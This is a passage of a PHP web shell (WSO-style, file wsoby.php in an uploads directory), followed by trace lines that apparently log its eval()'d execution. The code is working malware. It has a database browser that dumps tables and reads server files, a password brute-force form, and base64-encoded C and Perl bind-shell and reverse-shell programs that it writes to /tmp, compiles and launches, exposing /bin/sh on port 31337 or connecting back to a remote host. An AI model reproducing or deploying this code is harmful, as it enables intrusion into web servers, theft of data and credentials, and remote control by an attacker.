value="\'.htmlspecialchars($_POST[\'a\']).\'">\'\r\n\t\t.\'<input type=hidden name=charset value="\'.htmlspecialchars($_POST[\'charset\']).\'">\'\r\n\t\t.\'<input type=hidden name=ne value="">\'\r\n\t\t.\'<span>Server:port</span></td>\'\r\n\t\t.\'<td><input type=text name=server value="127.0.0.1"></td></tr>\'\r\n\t\t.\'<tr><td><span>Brute type</span></td>\'\r\n\t\t.\'<td><input type=radio name=type value="1" checked> /etc/passwd</td></tr>\'\r\n\t\t.\'<tr><td></td><td style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</td></tr>\'\r\n\t\t.\'<tr><td></td><td><input type=radio name=type value="2"> Dictionary</td></tr>\'\r\n\t\t.\'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>\'\r\n\t\t.\'<td><input type=text name=login value="root"></td></tr>\'\r\n\t\t.\'<tr><td><span>Dictionary</span></td>\'\r\n\t\t.\'<td><input type=text name=dict value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'passwd.dic"></td></tr></table>\'\r\n\t\t.\'</td></tr><tr><td></td><td><input type=submit value="submit"></td></tr></form></table>\';\r\n\techo \'</div>\';\r\n\thardFooter();\r\n}\r\nfunction actionSql() {\r\n\tclass DbClass {\r\n\t\tvar $type;\r\n\t\tvar $link;\r\n\t\tvar $res;\r\n\t\tfunction __construct($type)\t{\r\n\t\t\t$this->type = $type;\r\n\t\t}\r\n\t\tfunction connect($host, $user, $pass, $dbname){\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\tif( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;\r\n\t\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\t$host = explode(\':\', $host);\r\n\t\t\t\t\tif(!$host[1]) $host[1]=5432;\r\n\t\t\t\t\tif( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction selectdb($db) {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\tif (@mysql_select_db($db))return true;\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction query($str) {\r\n\t\t\tswitch($this->type) {\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\treturn $this->res = @mysql_query($str);\r\n\t\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\treturn $this->res = @pg_query($this->link,$str);\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction fetch() {\r\n\t\t\t$res = func_num_args()?func_get_arg(0):$this->res;\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\treturn @mysql_fetch_assoc($res);\r\n\t\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\treturn @pg_fetch_assoc($res);\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction listDbs() {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n return $this->query("SHOW databases");\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\treturn $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!=\'t\'");\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction listTables() {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\treturn $this->res = $this->query(\'SHOW TABLES\');\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\treturn $this->res = $this->query("select table_name from information_schema.tables where table_schema != \'information_schema\' AND table_schema != \'pg_catalog\'");\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction error() {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\treturn @mysql_error();\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\treturn @pg_last_error();\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction setCharset($str) {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\tif(function_exists(\'mysql_set_charset\'))\r\n\t\t\t\t\t\treturn @mysql_set_charset($str, $this->link);\r\n\t\t\t\t\telse\r\n\t\t\t\t\t\t$this->query(\'SET CHARSET \'.$str);\r\n\t\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\treturn @pg_set_client_encoding($this->link, $str);\r\n\t\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction loadFile($str) {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\treturn $this->fetch($this->query("SELECT LOAD_FILE(\'".addslashes($str)."\') as file"));\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\t$this->query("CREATE TABLE hard2(file text);COPY hard2 FROM \'".addslashes($str)."\';select file from hard2;");\r\n\t\t\t\t\t$r=array();\r\n\t\t\t\t\twhile($i=$this->fetch())\r\n\t\t\t\t\t\t$r[] = $i[\'file\'];\r\n\t\t\t\t\t$this->query(\'drop table hard2\');\r\n\t\t\t\t\treturn array(\'file\'=>implode("\\n",$r));\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t\tfunction dump($table, $fp = false) {\r\n\t\t\tswitch($this->type)\t{\r\n\t\t\t\tcase \'mysql\':\r\n\t\t\t\t\t$res = $this->query(\'SHOW CREATE TABLE `\'.$table.\'`\');\r\n\t\t\t\t\t$create = mysql_fetch_array($res);\r\n\t\t\t\t\t$sql = $create[1].";\\n";\r\n if($fp) fwrite($fp, $sql); else echo($sql);\r\n\t\t\t\t\t$this->query(\'SELECT * FROM `\'.$table.\'`\');\r\n $i = 0;\r\n $head = true;\r\n\t\t\t\t\twhile($▟ = $this->fetch()) {\r\n $sql = \'\';\r\n if($i % 1000 == 0) {\r\n $head = true;\r\n $sql = ";\\n\\n";\r\n }\r\n\t\t\t\t\t\t$columns = array();\r\n\t\t\t\t\t\tforeach($▟ as $k=>$v) {\r\n if($v === null)\r\n $▟[$k] = "NULL";\r\n elseif(is_int($v))\r\n $▟[$k] = $v;\r\n else\r\n $▟[$k] = "\'".@mysql_real_escape_string($v)."\'";\r\n\t\t\t\t\t\t\t$columns[] = "`".$k."`";\r\n\t\t\t\t\t\t}\r\n if($head) {\r\n $sql .= \'INSERT INTO `\'.$table.\'` (\'.implode(", ", $columns).") VALUES \\n\\t(".implode(", ", $▟).\')\';\r\n $head = false;\r\n } else\r\n $sql .= "\\n\\t,(".implode(", ", $▟).\')\';\r\n if($fp) fwrite($fp, $sql); else echo($sql);\r\n $i++;\r\n\t\t\t\t\t}\r\n if(!$head)\r\n if($fp) fwrite($fp, ";\\n\\n"); else echo(";\\n\\n");\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase \'pgsql\':\r\n\t\t\t\t\t$this->query(\'SELECT * FROM \'.$table);\r\n\t\t\t\t\twhile($▟ = $this->fetch()) {\r\n\t\t\t\t\t\t$columns = array();\r\n\t\t\t\t\t\tforeach($▟ as $k=>$v) {\r\n\t\t\t\t\t\t\t$▟[$k] = "\'".addslashes($v)."\'";\r\n\t\t\t\t\t\t\t$columns[] = $k;\r\n\t\t\t\t\t\t}\r\n $sql = \'INSERT INTO \'.$table.\' (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $▟).\');\'."\\n";\r\n if($fp) fwrite($fp, $sql); else echo($sql);\r\n\t\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\treturn false;\r\n\t\t}\r\n\t};\r\n\t$db = new DbClass($_POST[\'type\']);\r\n\tif((@$_POST[\'p2\']==\'download\') && (@$_POST[\'p1\']!=\'select\')) {\r\n\t\t$db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']);\r\n\t\t$db->selectdb($_POST[\'sql_base\']);\r\n switch($_POST[\'charset\']) {\r\n case "Windows-1251": $db->setCharset(\'cp1251\'); break;\r\n case "UTF-8": $db->setCharset(\'utf8\'); break;\r\n case "KOI8-R": $db->setCharset(\'koi8r\'); break;\r\n case "KOI8-U": $db->setCharset(\'koi8u\'); break;\r\n case "cp866": $db->setCharset(\'cp866\'); break;\r\n }\r\n if(empty($_POST[\'file\'])) {\r\n ob_start("ob_gzhandler", 4096);\r\n header("Content-Disposition: attachment; filename=dump.sql");\r\n header("Content-Type: text/plain");\r\n foreach($_POST[\'tbl\'] as $v)\r\n\t\t\t\t$db->dump($v);\r\n exit;\r\n } elseif($fp = @fopen($_POST[\'file\'], \'w\')) {\r\n foreach($_POST[\'tbl\'] as $v)\r\n $db->dump($v, $fp);\r\n fclose($fp);\r\n unset($_POST[\'p2\']);\r\n } else\r\n die(\'<script>alert("Error! Can\\\'t open file");window.history.back(-1)</script>\');\r\n\t}\r\n\thardHeader();\r\n\techo "\r\n<h1>Sql browser</h1><div class=content>\r\n<form name=\'sf\' method=\'post\' onsubmit=\'fs(this);\'><table cellpadding=\'2\' cellspacing=\'0\'><tr>\r\n<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>\r\n<input type=hidden name=ne value=\'\'><input type=hidden name=a value=Sql><input type=hidden name=p1 value=\'query\'><input type=hidden name=p2 value=\'\'><input type=hidden name=c value=\'". htmlspecialchars($GLOBALS[\'cwd\']) ."\'><input type=hidden name=charset value=\'". (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\') ."\'>\r\n<td><label><select name=\'type\'><option value=\'mysql\' ";\r\n if(@$_POST[\'type\']==\'mysql\')echo \'selected\';\r\necho ">MySql</option><option value=\'pgsql\' ";\r\nif(@$_POST[\'type\']==\'pgsql\')echo \'selected\';\r\necho ">PostgreSql</option></select></label></td>\r\n<td><input type=text name=sql_host value=\\"". (empty($_POST[\'sql_host\'])?\'localhost\':htmlspecialchars($_POST[\'sql_host\'])) ."\\"></td>\r\n<td><input type=text name=sql_login value=\\"". (empty($_POST[\'sql_login\'])?\'root\':htmlspecialchars($_POST[\'sql_login\'])) ."\\"></td>\r\n<td><input type=text name=sql_pass value=\\"". (empty($_POST[\'sql_pass\'])?\'\':htmlspecialchars($_POST[\'sql_pass\'])) ."\\" required></td><td>";\r\n\t$tmp = "<input type=text name=sql_base value=\'\'>";\r\n\tif(isset($_POST[\'sql_host\'])){\r\n\t\tif($db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\'])) {\r\n\t\t\tswitch($_POST[\'charset\']) {\r\n\t\t\t\tcase "Windows-1251": $db->setCharset(\'cp1251\'); break;\r\n\t\t\t\tcase "UTF-8": $db->setCharset(\'utf8\'); break;\r\n\t\t\t\tcase "KOI8-R": $db->setCharset(\'koi8r\'); break;\r\n\t\t\t\tcase "KOI8-U": $db->setCharset(\'koi8u\'); break;\r\n\t\t\t\tcase "cp866": $db->setCharset(\'cp866\'); break;\r\n\t\t\t}\r\n\t\t\t$db->listDbs();\r\n\t\t\techo "<label><select name=sql_base><option value=\'\'></option>";\r\n\t\t\twhile($▟ = $db->fetch()) {\r\n\t\t\t\tlist($key, $value) = each($▟);\r\n\t\t\t\techo \'<option value="\'.$value.\'" \'.($value==$_POST[\'sql_base\']?\'selected\':\'\').\'>\'.$value.\'</option>\';\r\n\t\t\t}\r\n\t\t\techo \'</select></label>\';\r\n\t\t}\r\n\t\telse echo $tmp;\r\n\t}else\r\n\t\techo $tmp;\r\n\techo "</td>\r\n\t\t\t\t<td><input type=submit value=\'submit\' onclick=\'fs(d.sf);\'></td>\r\n <td><input type=checkbox name=sql_count value=\'on\'" . (empty($_POST[\'sql_count\'])?\'\':\' checked\') . "> count the number of rows</td>\r\n\t\t\t</tr>\r\n\t\t</table>\r\n\t\t<script>\r\n s_db=\'".@addslashes($_POST[\'sql_base\'])."\';\r\n function fs(f) {\r\n if(f.sql_base.value!=s_db) { f.onsubmit = function() {};\r\n if(f.p1) f.p1.value=\'\';\r\n if(f.p2) f.p2.value=\'\';\r\n if(f.p3) f.p3.value=\'\';\r\n }\r\n }\r\n\t\t\tfunction st(t,l) {\r\n\t\t\t\td.sf.p1.value = \'select\';\r\n\t\t\t\td.sf.p2.value = t;\r\n if(l && d.sf.p3) d.sf.p3.value = l;\r\n\t\t\t\td.sf.submit();\r\n\t\t\t}\r\n\t\t\tfunction is() {\r\n\t\t\t\tfor(i=0;i<d.sf.elements[\'tbl[]\'].length;++i)\r\n\t\t\t\t\td.sf.elements[\'tbl[]\'][i].checked = !d.sf.elements[\'tbl[]\'][i].checked;\r\n\t\t\t}\r\n\t\t</script>";\r\n\tif(isset($db) && $db->link){\r\n\t\techo "<br/><table width=100% cellpadding=2 cellspacing=0>";\r\n\t\t\tif(!empty($_POST[\'sql_base\'])){\r\n\t\t\t\t$db->selectdb($_POST[\'sql_base\']);\r\n\t\t\t\techo "<tr><td width=1 style=\'border-top:2px solid #666;\'><span>Tables:</span><br><br>";\r\n\t\t\t\t$tbls_res = $db->listTables();\r\n\t\t\t\twhile($▟ = $db->fetch($tbls_res)) {\r\n\t\t\t\t\tlist($key, $value) = each($▟);\r\n if(!empty($_POST[\'sql_count\']))\r\n $n = $db->fetch($db->query(\'SELECT COUNT(*) as n FROM \'.$value.\'\'));\r\n\t\t\t\t\t$value = htmlspecialchars($value);\r\n\t\t\t\t\techo "<nobr><input type=\'checkbox\' name=\'tbl[]\' value=\'".$value."\'> <a href=# onclick=\\"st(\'".$value."\',1)\\">".$value."</a>" . (empty($_POST[\'sql_count\'])?\' \':" <small>({$n[\'n\']})</small>") . "</nobr><br>";\r\n\t\t\t\t}\r\n\t\t\t\techo "<input type=\'checkbox\' onclick=\'is();\'> <input type=submit value=\'Dump\' onclick=\'document.sf.p2.value=\\"download\\";document.sf.submit();\'><br>File path:<input type=text name=file value=\'dump.sql\'></td><td style=\'border-top:2px solid #666;\'>";\r\n\t\t\t\tif(@$_POST[\'p1\'] == \'select\') {\r\n\t\t\t\t\t$_POST[\'p1\'] = \'query\';\r\n $_POST[\'p3\'] = $_POST[\'p3\']?$_POST[\'p3\']:1;\r\n\t\t\t\t\t$db->query(\'SELECT COUNT(*) as n FROM \' . $_POST[\'p2\']);\r\n\t\t\t\t\t$num = $db->fetch();\r\n\t\t\t\t\t$pages = ceil($num[\'n\'] / 30);\r\n echo "<script>d.sf.onsubmit=function(){st(\\"" . $_POST[\'p2\'] . "\\", d.sf.p3.value)}</script><span>".$_POST[\'p2\']."</span> ({$num[\'n\']} records) Page # <input type=text name=\'p3\' value=" . ((int)$_POST[\'p3\']) . ">";\r\n echo " of $pages";\r\n if($_POST[\'p3\'] > 1)\r\n echo " <a href=# onclick=\'st(\\"" . $_POST[\'p2\'] . \'", \' . ($_POST[\'p3\']-1) . ")\'>< Prev</a>";\r\n if($_POST[\'p3\'] < $pages)\r\n echo " <a href=# onclick=\'st(\\"" . $_POST[\'p2\'] . \'", \' . ($_POST[\'p3\']+1) . ")\'>Next ></a>";\r\n $_POST[\'p3\']--;\r\n\t\t\t\t\tif($_POST[\'type\']==\'pgsql\')\r\n\t\t\t\t\t\t$_POST[\'p2\'] = \'SELECT * FROM \'.$_POST[\'p2\'].\' LIMIT 30 OFFSET \'.($_POST[\'p3\']*30);\r\n\t\t\t\t\telse\r\n\t\t\t\t\t\t$_POST[\'p2\'] = \'SELECT * FROM `\'.$_POST[\'p2\'].\'` LIMIT \'.($_POST[\'p3\']*30).\',30\';\r\n\t\t\t\t\techo "<br><br>";\r\n\t\t\t\t}\r\n\t\t\t\tif((@$_POST[\'p1\'] == \'query\') && !empty($_POST[\'p2\'])) {\r\n\t\t\t\t\t$db->query(@$_POST[\'p2\']);\r\n\t\t\t\t\tif($db->res !== false) {\r\n\t\t\t\t\t\t$title = false;\r\n\t\t\t\t\t\techo \'<table width=100% cellspacing=1 cellpadding=2 class=main>\';\r\n\t\t\t\t\t\t$line = 1;\r\n\t\t\t\t\t\twhile($▟ = $db->fetch())\t{\r\n\t\t\t\t\t\t\tif(!$title)\t{\r\n\t\t\t\t\t\t\t\techo \'<tr>\';\r\n\t\t\t\t\t\t\t\tforeach($▟ as $key => $value)\r\n\t\t\t\t\t\t\t\t\techo \'<th>\'.$key.\'</th>\';\r\n\t\t\t\t\t\t\t\treset($▟);\r\n\t\t\t\t\t\t\t\t$title=true;\r\n\t\t\t\t\t\t\t\techo \'</tr><tr>\';\r\n\t\t\t\t\t\t\t\t$line = 2;\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\techo \'<tr class="l\'.$line.\'">\';\r\n\t\t\t\t\t\t\t$line = $line==1?2:1;\r\n\t\t\t\t\t\t\tforeach($▟ as $key => $value) {\r\n\t\t\t\t\t\t\t\tif($value == null)\r\n\t\t\t\t\t\t\t\t\techo \'<td><i>null</i></td>\';\r\n\t\t\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t\t\techo \'<td>\'.nl2br(htmlspecialchars($value)).\'</td>\';\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\techo \'</tr>\';\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\techo \'</table>\';\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo \'<div><b>Error:</b> \'.htmlspecialchars($db->error()).\'</div>\';\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\techo "<br></form><form onsubmit=\'d.sf.p1.value=\\"query\\";d.sf.p2.value=this.query.value;document.sf.submit();return false;\'><textarea name=\'query\' style=\'width:100%;height:100px\'>";\r\n if(!empty($_POST[\'p2\']) && ($_POST[\'p1\'] != \'loadfile\'))\r\n echo htmlspecialchars($_POST[\'p2\']);\r\n echo "</textarea><br/><input type=submit value=\'Execute\'>";\r\n\t\t\t\techo "</td></tr>";\r\n\t\t\t}\r\n\t\t\techo "</table></form><br/>";\r\n if($_POST[\'type\']==\'mysql\') {\r\n $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, \'@\', `host`) = USER() AND `File_priv` = \'y\'");\r\n if($db->fetch())\r\n echo "<form onsubmit=\'d.sf.p1.value=\\"loadfile\\";document.sf.p2.value=this.f.value;document.sf.submit();return false;\'><span>Load file</span> <input class=\'toolsInp\' type=text name=f><input type=submit value=\'submit\'></form>";\r\n }\r\n\t\t\tif(@$_POST[\'p1\'] == \'loadfile\') {\r\n\t\t\t\t$file = $db->loadFile($_POST[\'p2\']);\r\n\t\t\t\techo \'<br/><pre class=ml1>\'.htmlspecialchars($file[\'file\']).\'</pre>\';\r\n\t\t\t}\r\n\t} else {\r\n echo htmlspecialchars($db->error());\r\n }\r\n\techo \'</div>\';\r\n\thardFooter();\r\n}\r\nfunction actionNetwork() {\r\n\thardHeader();\r\n\t$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";\r\n\t$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";\r\n\t$bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9";\r\n\t$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";\r\n\techo "<h1>Network tools</h1><div class=content>\r\n\t<form name=\'nfp\' onSubmit=\'g(null,null,this.using.value,this.port.value,this.pass.value);return false;\'>\r\n\t<span>Bind port to /bin/sh</span><br/>\r\n\tPort: <input type=\'text\' name=\'port\' value=\'31337\'> Password: <input type=\'text\' name=\'pass\'> Using: <label><select name=\'using\'><option value=\'bpc\'>C</option><option value=\'bpp\'>Perl</option></select></label> <input type=submit value=\'submit\'>\r\n\t</form>\r\n\t<form name=\'nfp\' onSubmit=\'g(null,null,this.using.value,this.server.value,this.port.value);return false;\'>\r\n\t<span>Back-connect to</span><br/>\r\n\tServer: <input type=\'text\' name=\'server\' value=". $_SERVER[\'REMOTE_ADDR\'] ."> Port: <input type=\'text\' name=\'port\' value=\'31337\'> Using: <label><select name=\'using\'><option value=\'bcc\'>C</option><option value=\'bcp\'>Perl</option></select></label> <input type=submit value=\'submit\'>\r\n\t</form><br>";\r\n\tif(isset($_POST[\'p1\'])) {\r\n\t\tfunction cf($f,$t) {\r\n\t\t\t$w=@fopen($f,"w") or @function_exists(\'file_put_contents\');\r\n\t\t\tif($w)\t{\r\n\t\t\t\t@fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));\r\n\t\t\t\t@fclose($w);\r\n\t\t\t}\r\n\t\t}\r\n\t\tif($_POST[\'p1\'] == \'bpc\') {\r\n\t\t\tcf("/tmp/bp.c",$bind_port_c);\r\n\t\t\t$▖ = ex("gcc -o /tmp/bp /tmp/bp.c");\r\n\t\t\t@unlink("/tmp/bp.c");\r\n\t\t\t$▖ .= ex("/tmp/bp ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n\t\t\techo "<pre class=ml1>$▖".ex("ps aux | grep bp")."</pre>";\r\n\t\t}\r\n\t\tif($_POST[\'p1\'] == \'bpp\') {\r\n\t\t\tcf("/tmp/bp.pl",$bind_port_p);\r\n\t\t\t$▖ = ex(which("perl")." /tmp/bp.pl ".$_POST[\'p2\']." &");\r\n\t\t\techo "<pre class=ml1>$▖".ex("ps aux | grep bp.pl")."</pre>";\r\n\t\t}\r\n\t\tif($_POST[\'p1\'] == \'bcc\') {\r\n\t\t\tcf("/tmp/bc.c",$back_connect_c);\r\n\t\t\t$▖ = ex("gcc -o /tmp/bc /tmp/bc.c");\r\n\t\t\t@unlink("/tmp/bc.c");\r\n\t\t\t$▖ .= ex("/tmp/bc ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n\t\t\techo "<pre class=ml1>$▖".ex("ps aux | grep bc")."</pre>";\r\n\t\t}\r\n\t\tif($_POST[\'p1\'] == \'bcp\') {\r\n\t\t\tcf("/tmp/bc.pl",$back_connect_p);\r\n\t\t\t$▖ = ex(which("perl")." /tmp/bc.pl ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n\t\t\techo "<pre class=ml1>$▖".ex("ps aux | grep bc.pl")."</pre>";\r\n\t\t}\r\n\t}\r\n\techo \'</div>\';\r\n\thardFooter();\r\n}\r\nif( empty($_POST[\'a\']) )\r\n\tif(isset($▚) && function_exists(\'action\' . $▚))\r\n\t\t$_POST[\'a\'] = $▚;\r\n\telse\r\n\t\t$_POST[\'a\'] = \'FilesMan\';\r\nif( !empty($_POST[\'a\']) && function_exists(\'action\' . $_POST[\'a\']) )\r\n\tcall_user_func(\'action\' . $_POST[\'a\']);\r\n?>' /var/www/html/uploads/wsoby.php 1 0
3 6 0 0.062806 1046456 array_key_exists 0 /var/www/html/uploads/wsoby.php(1) : eval()'d code 3 2 'watching' []
3 6 1 0.062825 1046520
3 6 R FALSE
2 A /var/www/html/uploads/wsoby.php(1) : eval()'d code 7 $▛ = 'd2f7bd4883410688e2ece6b5e9b85856'
2 A /var/www/html/uploads/wsoby.php(1) : eval()'d code 8 $▘ = TRUE
2 A /var/www/html/uploads/wsoby.php(1) : eval()'d code 9 $▜ = 'UTF-8'
